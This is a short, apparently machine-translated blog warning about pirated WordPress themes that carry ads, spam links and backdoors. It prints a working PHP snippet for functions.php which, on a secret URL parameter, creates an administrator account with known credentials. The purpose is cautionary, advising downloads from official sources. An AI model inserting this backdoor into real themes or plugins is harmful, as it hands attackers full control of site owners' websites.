Be careful! Pirate theme may have a back door

WordPress In addition to a large number of official themes, there are a large number of theme designers to publish free and charge topics, many children’s shoes often collect the theme to get back to use the test, some of which will be collected by foreign experts to fill the theme of commercial changes, add Dark chain, advertising, and even malicious code, and then free or paid public release, to induce others to download and use, to achieve ulterior motives. In addition, these commercial charges are generally the subject of the test version, the subject code is not perfect, the function is missing, individual test version of the commercial theme is enabled after the database will automatically write a lot of data …….

The following code is more evil and can automatically add a role for the admin user.

  1. add_action(‘wp_head’, ‘holeinthewall’);
  2. function holeinthewall() {
  3.         If ($_GET[‘backdoor’] == ‘go’) {
  4. require(‘wp-includes/registration.php’);
  5.                 If (!username_exists(‘username’)) {
  6. $user_id = wp_create_user(‘username’, ‘password’);
  7. $user = new WP_User($user_id);
  8. $user->set_role(‘administrator’);
  9.                 }
  10.         }
  11. }

Add the code to your current theme functions.php file or plugin, will automatically create a user name: username password: password administrator who have the authority, then want to do anything.

So, here advise you still do not use their own site pirated themes and plug-ins, as far as possible to the official or original publishing site to download the theme, so as not to be opened the back door is not known!